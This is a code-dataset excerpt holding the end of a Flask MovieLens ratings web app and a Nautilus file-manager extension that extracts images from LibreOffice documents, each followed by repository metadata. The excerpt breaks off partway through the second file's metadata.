'ratings'\r\n userId = Column(Integer)\r\n movieId = Column(Integer, ForeignKey('movies.movieId'))\r\n rating = Column(Float)\r\n timestamp = Column(BIGINT)\r\n id = Column(VARCHAR(100),primary_key=True)\r\n\r\n\r\nmovie = relationship(\"movies\", back_populates=\"ratings\")\r\n\r\n\r\n#NO-USED TABLES \r\n\"\"\"\r\n\r\nclass genome_tags(db.Model):\r\n __tablename__ = 'genome_tags'\r\n tagId = Column(Integer, ForeignKey('genome_scores.tagId'))\r\n tag = Column(VARCHAR(255))\r\n\r\nclass genome_scores(db.Model):\r\n __tablename__ = 'genome_scores'\r\n movieId = Column(Integer, ForeignKey('movies.movieId'))\r\n tagId = Column(Integer,primary_key=True)\r\n relevence = Column(Float)\r\n\r\nclass tags(db.Model):\r\n __tablename__ = 'tags'\r\n tagid= Column(Integer,primary_key=True)\r\n userId = Column(Integer)\r\n movieId = Column(Integer, ForeignKey('movies.movieId'))\r\n tag = Column(VARCHAR(255))\r\n timestamp = Column(BIGINT)\r\n \"\"\"\r\n\r\n\r\n\r\n###############################\r\n#creating new table2 (newtable2=each movie with all users)\r\n'''\r\ndef create_newtable2():\r\n with app.app_context():\r\n db.create_all()\r\n insert_query = text(\r\n \"SELECT movies.title, GROUP_CONCAT(DISTINCT ratings.userId) AS users , ratings.rating FROM movies JOIN ratings ON movies.movieId = ratings.movieId GROUP BY movies.movieId, ratings.rating HAVING COUNT(DISTINCT ratings.userId) > 10\")\r\n engine.execute(insert_query)\r\ncreate_newtable2() \r\n'''\r\n#creating new table2 (newtable= each movie with avg rating and count )\r\n\r\n''' \r\n\r\ndef create_newtable():\r\n with app.app_context():\r\n db.create_all()\r\n insert_query = text(\r\n \"SELECT movieId, AVG(rating), COUNT(rating) FROM ratings GROUP BY movieId\")\r\n engine.execute(insert_query)\r\ncreate_newtable() \r\n'''\r\n###############################\r\n # Create a session to the database\r\nSession = sessionmaker(bind=engine)\r\nsession = Session()\r\n\r\n\r\n@app.route('/', methods=['GET'])\r\ndef view_movies():\r\n # Query the database for all movies\r\n data =session.query(movies).all()\r\n #data=movies.query.all()\r\n return render_template('index.html',data=data)\r\n\r\n\r\n@app.route('/search', methods=['GET', 'POST'])\r\ndef search():\r\n \r\n query = request.form.get('search')\r\n results = session.query(movies).filter(movies.title.like('%' + query + '%')).all()\r\n\r\n return render_template('search.html',results=results, query=query)\r\n\r\n\r\n###################################################################################################################################\r\n###################################################################################################################################\r\n###################################################################################################################################\r\n#ROUTE FOR ALL GENRES (I USED TABLE BUTON )\r\n@app.route('/action', methods=['GET', 'POST'])\r\ndef action():\r\n \r\n action=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'action' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('action.html',action=action)\r\n\r\n@app.route('/adventure', methods=['GET', 'POST'])\r\ndef adventure():\r\n \r\n adventure=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'adventure' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('adventure.html',adventure=adventure)\r\n\r\n@app.route('/animation', methods=['GET', 'POST'])\r\ndef animation():\r\n \r\n animation=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'animation' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('animation.html',animation=animation)\r\n\r\n@app.route('/children', methods=['GET', 'POST'])\r\ndef children():\r\n children=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'children' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('children.html',children=children)\r\n\r\n@app.route('/comedy', methods=['GET', 'POST'])\r\ndef comedy():\r\n comedy=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'comedy' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('comedy.html',comedy=comedy)\r\n\r\n@app.route('/crime', methods=['GET', 'POST'])\r\ndef crime():\r\n crime=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'crime' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('crime.html',crime=crime)\r\n\r\n@app.route('/documentary', methods=['GET', 'POST'])\r\ndef documentary():\r\n documentary=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'documentary' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('documentary.html',documentary=documentary)\r\n\r\n@app.route('/drama', methods=['GET', 'POST'])\r\ndef drama():\r\n drama=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'drama' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('drama.html',drama=drama)\r\n\r\n@app.route('/fantasy', methods=['GET', 'POST'])\r\ndef fantasy():\r\n fantasy=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'fantasy' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('fantasy.html',fantasy=fantasy)\r\n\r\n\r\n@app.route('/filmnoir', methods=['GET', 'POST'])\r\ndef filmnoir():\r\n filmnoir=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'filmnoir' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('filmnoir.html',filmnoir=filmnoir)\r\n\r\n@app.route('/horror', methods=['GET', 'POST'])\r\ndef horror():\r\n horror=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'horror' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('horror.html',horror=horror)\r\n\r\n@app.route('/musical', methods=['GET', 'POST'])\r\ndef musical():\r\n musical=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'musical' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('musical.html',musical=musical)\r\n\r\n@app.route('/mystery', methods=['GET', 'POST'])\r\ndef mystery():\r\n mystery=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'mystery' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('mystery.html',mystery=mystery)\r\n\r\n@app.route('/romance', methods=['GET', 'POST'])\r\ndef romance():\r\n romance=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'romance' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('romance.html',romance=romance)\r\n\r\n@app.route('/scifi', methods=['GET', 'POST'])\r\ndef scifi():\r\n scifi=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'scifi' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('scifi.html',scifi=scifi)\r\n\r\n@app.route('/thriller', methods=['GET', 'POST'])\r\ndef thriller():\r\n thriller=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'thriller' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('thriller.html',thriller=thriller)\r\n\r\n\r\n@app.route('/war', methods=['GET', 'POST'])\r\ndef war():\r\n war=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'war' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('war.html',war=war)\r\n\r\n@app.route('/western', methods=['GET', 'POST'])\r\ndef western():\r\n western=db.session.query(movies.movieId, movies.title, movies.genres, newtable.avg_rating,\r\n newtable.rating_count) \\\r\n .join(newtable, movies.movieId == newtable.movieId) \\\r\n .filter(movies.genres.like('%' + 'western' + '%')) \\\r\n .order_by(newtable.rating_count.desc(), newtable.avg_rating.desc()) \\\r\n .limit(20)\r\n return render_template('western.html',western=western)\r\n###################################################################################################################################\r\n###################################################################################################################################\r\n###################################################################################################################################\r\n@app.route('/users', methods=['GET', 'POST'])\r\ndef users():\r\n users =db.session.query(newtable2).all()\r\n return render_template('users.html', users=users)\r\n\r\n\r\n@app.route('/allusers', methods=['GET', 'POST'])\r\ndef allusers():\r\n quer = request.form.get('user')\r\n allusers = session.query(newtable2).filter(newtable2.title.like('%' + quer + '%')).all()\r\n return render_template('allusers.html', allusers=allusers)\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n\r\n\r\n\r\n'''\r\n# Query the database for all movies\r\nmo = session.query(ratings).all()\r\nmovie_id = mo[0].rating\r\n\r\n# Print the titles of all the movies\r\nprint(movie_id)\r\n \r\n\r\n# Close the session\r\nsession.close()\r\n'''\r\n", "repo_name": "semlanimehdi/Movielens-webapp-", "sub_path": "movielenss copy.py", "file_name": "movielenss copy.py", "file_ext": "py", "file_size_in_byte": 15844, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 19, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 36, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 36, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 37, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 37, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 38, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 38, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 50, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql.LONGTEXT", "line_number": 51, "usage_type": "argument"}, {"api_name": "sqlalchemy.Float", "line_number": 52, "usage_type": "argument"}, {"api_name": "sqlalchemy.Integer", "line_number": 53, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 58, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 58, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 59, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 59, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 59, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 60, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 60, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 61, "usage_type": "call"}, {"api_name": "sqlalchemy.CHAR", "line_number": 61, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 65, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 65, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 66, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 66, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 66, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 67, "usage_type": "call"}, {"api_name": "sqlalchemy.Float", "line_number": 67, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 68, "usage_type": "call"}, {"api_name": "sqlalchemy.BIGINT", "line_number": 68, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 69, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 69, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.relationship", "line_number": 72, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 125, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 134, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 140, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 140, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 140, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 143, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 159, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 170, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 181, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 191, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 201, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 211, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 221, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 231, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 241, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 252, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 262, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 272, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 282, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 292, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 302, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 312, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 323, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 333, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 340, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 345, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 345, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 345, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 347, "usage_type": "call"}]} +{"seq_id": "5871669098", "text": "import gi\ntry:\n gi.require_version('Gtk', '3.0')\n gi.require_version('GObject', '2.0')\n gi.require_version('GLib', '2.0')\n gi.require_version('Nautilus', '3.0')\nexcept Exception as e:\n print(e)\n exit(-1)\nfrom gi.repository import Gtk\nfrom gi.repository import GObject\nfrom gi.repository import GLib\nfrom gi.repository import Nautilus as FileManager\nfrom zipfile import ZipFile\nimport os\nimport shutil\nfrom threading import Thread\nimport mimetypes\nfrom urllib import unquote_plus\n\nAPP = '$APP$'\nVERSION = '$VERSION$'\n\nCONFIG_DIR = os.path.join(os.path.expanduser('~'), '.config', APP.lower())\nif not os.path.exists(CONFIG_DIR):\n os.makedirs(CONFIG_DIR)\nCONFIG_FILE = os.path.join(CONFIG_DIR, '{0}.conf'.format(APP.lower()))\n\nMARGIN = 10\nMIMETYPES = ['application/vnd.oasis.opendocument.text',\n 'application/vnd.oasis.opendocument.text-template',\n 'application/vnd.oasis.opendocument.graphics',\n 'application/vnd.oasis.opendocument.graphics-template',\n 'application/vnd.oasis.opendocument.presentation',\n 'application/vnd.oasis.opendocument.presentation-template',\n 'application/vnd.oasis.opendocument.spreadsheet',\n 'application/vnd.oasis.opendocument.spreadsheet-template']\nMIMETYPES_IMAGES = ['image/png',\n 'image/jpeg',\n 'image/bmp',\n 'image/gif',\n 'image/tiff',\n 'image/x-tiff']\n_ = str\n\n\ndef get_files(files_in):\n files = []\n for file_in in files_in:\n print(file_in)\n file_in = unquote_plus(file_in.get_uri()[7:])\n if os.path.isfile(file_in):\n files.append(file_in)\n return files\n\n\ndef extract_images(orginalFile):\n filename, fileextension = os.path.splitext(orginalFile)\n destFolder = '{0}_images'.format(filename)\n\n if os.path.exists(destFolder):\n shutil.rmtree(destFolder, True)\n os.makedirs(destFolder)\n\n with ZipFile(orginalFile, 'r') as myzip:\n for element in myzip.infolist():\n filename = element.filename.decode()\n if filename.startswith('Pictures/') and\\\n mimetypes.guess_type(\n 'file://' + filename)[0] in MIMETYPES_IMAGES:\n print(element.filename, type(element))\n name = element.filename[9:]\n unpacked = open(os.path.join(destFolder, name), 'w')\n unpacked.write(myzip.read(filename))\n unpacked.close()\n\n\nclass ProgressDialog(Gtk.Dialog):\n __gsignals__ = {\n 'i-want-stop': (GObject.SIGNAL_RUN_FIRST, GObject.TYPE_NONE, ()),\n }\n\n def __init__(self, title, parent, max_value):\n Gtk.Dialog.__init__(self, title, parent)\n self.set_position(Gtk.WindowPosition.CENTER_ALWAYS)\n self.set_size_request(330, 30)\n self.set_resizable(False)\n self.connect('destroy', self.close)\n self.set_modal(True)\n vbox = Gtk.VBox(spacing=5)\n vbox.set_border_width(5)\n self.get_content_area().add(vbox)\n #\n frame1 = Gtk.Frame()\n vbox.pack_start(frame1, True, True, 0)\n table = Gtk.Table(2, 2, False)\n frame1.add(table)\n #\n self.label = Gtk.Label()\n table.attach(self.label, 0, 2, 0, 1,\n xpadding=5,\n ypadding=5,\n xoptions=Gtk.AttachOptions.SHRINK,\n yoptions=Gtk.AttachOptions.EXPAND)\n #\n self.progressbar = Gtk.ProgressBar()\n self.progressbar.set_size_request(300, 0)\n table.attach(self.progressbar, 0, 1, 1, 2,\n xpadding=5,\n ypadding=5,\n xoptions=Gtk.AttachOptions.SHRINK,\n yoptions=Gtk.AttachOptions.EXPAND)\n button_stop = Gtk.Button()\n button_stop.set_size_request(40, 40)\n button_stop.set_image(\n Gtk.Image.new_from_stock(Gtk.STOCK_STOP, Gtk.IconSize.BUTTON))\n button_stop.connect('clicked', self.on_button_stop_clicked)\n table.attach(button_stop, 1, 2, 1, 2,\n xpadding=5,\n ypadding=5,\n xoptions=Gtk.AttachOptions.SHRINK)\n self.stop = False\n self.show_all()\n self.max_value = max_value\n self.value = 0.0\n\n def emit(self, *args):\n GLib.idle_add(GObject.GObject.emit, self, *args)\n\n def set_max_value(self, anobject, max_value):\n self.max_value = float(max_value)\n\n def get_stop(self):\n return self.stop\n\n def on_button_stop_clicked(self, widget):\n self.stop = True\n self.emit('i-want-stop')\n\n def close(self, *args):\n self.destroy()\n\n def set_element(self, anobject, element):\n self.label.set_text(_('Compress: %s') % element)\n\n def increase(self, anobject, value):\n self.value += float(value)\n fraction = self.value / self.max_value\n self.progressbar.set_fraction(fraction)\n if self.value == self.max_value:\n self.hide()\n\n\nclass DoItInBackground(GObject.GObject, Thread):\n __gsignals__ = {\n 'started': (GObject.SIGNAL_RUN_FIRST, GObject.TYPE_NONE, (int,)),\n 'ended': (GObject.SIGNAL_RUN_FIRST, GObject.TYPE_NONE, (bool,)),\n 'start_one': (GObject.SIGNAL_RUN_FIRST, GObject.TYPE_NONE, (str,)),\n 'end_one': (GObject.SIGNAL_RUN_FIRST, GObject.TYPE_NONE, (int,)),\n }\n\n def __init__(self, elements):\n GObject.GObject.__init__(self)\n Thread.__init__(self)\n self.elements = elements\n self.stopit = False\n self.ok = True\n self.daemon = True\n self.process = None\n\n def emit(self, *args):\n GLib.idle_add(GObject.GObject.emit, self, *args)\n\n def stop(self, *args):\n self.stopit = True\n\n def extract_images(self, file_in):\n extract_images(file_in)\n\n def run(self):\n total = 0\n for element in self.elements:\n total += os.path.getsize(element)\n self.emit('started', total)\n try:\n for element in self.elements:\n print(element)\n if self.stopit is True:\n self.ok = False\n break\n self.emit('start_one', element)\n self.extract_images(element)\n self.emit('end_one', os.path.getsize(element))\n except Exception as e:\n self.ok = False\n try:\n if self.process is not None:\n self.process.terminate()\n self.process = None\n except Exception as e:\n print(e)\n self.emit('ended', self.ok)\n\n\nclass ExtImagesODTFileMenuProvider(GObject.GObject, FileManager.MenuProvider):\n \"\"\"\n Implements the 'Replace in Filenames' extension to the File Manager\\\n right-click menu\n \"\"\"\n\n def __init__(self):\n \"\"\"\n File Manager crashes if a plugin doesn't implement the __init__\\\n method\n \"\"\"\n mimetypes.init()\n pass\n\n def all_are_odt_files(self, items):\n for item in items:\n file_in = unquote_plus(item.get_uri()[7:])\n if not os.path.isfile(file_in):\n return False\n mimetype = mimetypes.guess_type('file://' + file_in)[0]\n if mimetype not in MIMETYPES:\n return False\n return True\n\n def extractimages(self, menu, selected, window):\n odtfiles = get_files(selected)\n diib = DoItInBackground(odtfiles)\n progreso = ProgressDialog(_('Compress ODT file'),\n window,\n len(odtfiles))\n diib.connect('started', progreso.set_max_value)\n diib.connect('start_one', progreso.set_element)\n diib.connect('end_one', progreso.increase)\n diib.connect('ended', progreso.close)\n progreso.connect('i-want-stop', diib.stop)\n diib.start()\n progreso.run()\n\n def get_file_items(self, window, sel_items):\n \"\"\"\n Adds the 'Replace in Filenames' menu item to the File Manager\\\n right-click menu, connects its 'activate' signal to the 'run'\\\n method passing the selected Directory/File\n \"\"\"\n top_menuitem = FileManager.MenuItem(\n name='ExtImagesODTFileMenuProvider::Gtk-extimaagesfodt-top',\n label=_('Extract images from LibreOffice files') + '...',\n tip=_('Tool to extract images from LibreOffice files'))\n submenu = FileManager.Menu()\n top_menuitem.set_submenu(submenu)\n\n sub_menuitem_00 = FileManager.MenuItem(\n name='ExtImagesODTFileMenuProvider::Gtk-extimaagesfodt-sub-00',\n label=_('Extract images from LibreOffice files'),\n tip=_('Tool to extract images from LibreOffice files'))\n if self.all_are_odt_files(sel_items):\n sub_menuitem_00.connect('activate',\n self.extractimages,\n sel_items,\n window)\n else:\n sub_menuitem_00.set_property('sensitive', False)\n submenu.append_item(sub_menuitem_00)\n\n sub_menuitem_02 = FileManager.MenuItem(\n name='ExtImagesODTFileMenuProvider::Gtk-extimaagesfodt-sub-02',\n label=_('About'),\n tip=_('About'))\n sub_menuitem_02.connect('activate', self.about, window)\n submenu.append_item(sub_menuitem_02)\n\n return top_menuitem,\n\n def about(self, widget, window):\n ad = Gtk.AboutDialog(parent=window)\n ad.set_name(APP)\n ad.set_version(VERSION)\n ad.set_copyright('Copyrignt (c) 2017\\nLorenzo Carbonell')\n ad.set_comments(APP)\n ad.set_license('''\nThis program is free software: you can redistribute it and/or modify it under\nthe terms of the GNU General Public License as published by the Free Software\nFoundation, either version 3 of the License, or (at your option) any later\nversion.\n\nThis program is distributed in the hope that it will be useful, but WITHOUT\nANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\nFOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License along with\nthis program. If not, see .\n''')\n ad.set_website('http://www.atareao.es')\n ad.set_website_label('http://www.atareao.es')\n ad.set_authors([\n 'Lorenzo Carbonell '])\n ad.set_documenters([\n 'Lorenzo Carbonell '])\n ad.set_icon_name(APP)\n ad.set_logo_icon_name(APP)\n ad.run()\n ad.destroy()\n\n\nif __name__ == '__main__':\n files = ['/home/lorenzo/Escritorio/ODT samples/test1.odt',\n '/home/lorenzo/Escritorio/ODT samples/test2.odt',\n '/home/lorenzo/Escritorio/ODT samples/test3.odt',\n '/home/lorenzo/Escritorio/ODT samples/test4.odt',\n '/home/lorenzo/Escritorio/ODT samples/test5.odt']\n # reduce_lo_file(orginalFile)\n pd = ProgressDialog('Test', None, len(files))\n diib = DoItInBackground(files)\n diib.connect('started', pd.set_max_value)\n diib.connect('start_one', pd.set_element)\n diib.connect('end_one', pd.increase)\n diib.connect('ended', pd.close)\n pd.connect('i-want-stop', diib.stop)\n diib.run()\n #pd = ProgressDialog('Test', None, 5)\n pd.run()\n", "repo_name": "atareao/nautilus-loextract", "sub_path": "src/nautilus-loextract.py", "file_name": "nautilus-loextract.py", "file_ext": "py", "file_size_in_byte": 11567, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "gi.require_version", "line_number": 3, "usage_type": "call"}, {"api_name": "gi.require_version", "line_number": 4, "usage_type": "call"}, {"api_name": "gi.require_version", "line_number": 5, "usage_type": "call"}, {"api_name": "gi.require_version", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "urllib.unquote_plus", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 62, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 63, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 65, "usage_type": "call"}, {"api_name": "mimetypes.guess_type", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Dialog", "line_number": 78, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 78, "usage_type": "name"}, {"api_name": "gi.repository.GObject.SIGNAL_RUN_FIRST", "line_number": 80, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject", "line_number": 80, "usage_type": "name"}, {"api_name": "gi.repository.GObject.TYPE_NONE", "line_number": 80, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Dialog.__init__", "line_number": 84, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Dialog", "line_number": 84, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 84, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.WindowPosition", "line_number": 85, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 85, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.VBox", "line_number": 90, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 90, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Frame", "line_number": 94, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 94, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Table", "line_number": 96, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 96, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 99, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 99, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.AttachOptions", "line_number": 103, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 103, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.AttachOptions", "line_number": 104, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 104, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ProgressBar", "line_number": 106, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 106, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.AttachOptions", "line_number": 111, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 111, "usage_type": "name"}, {"api_name": 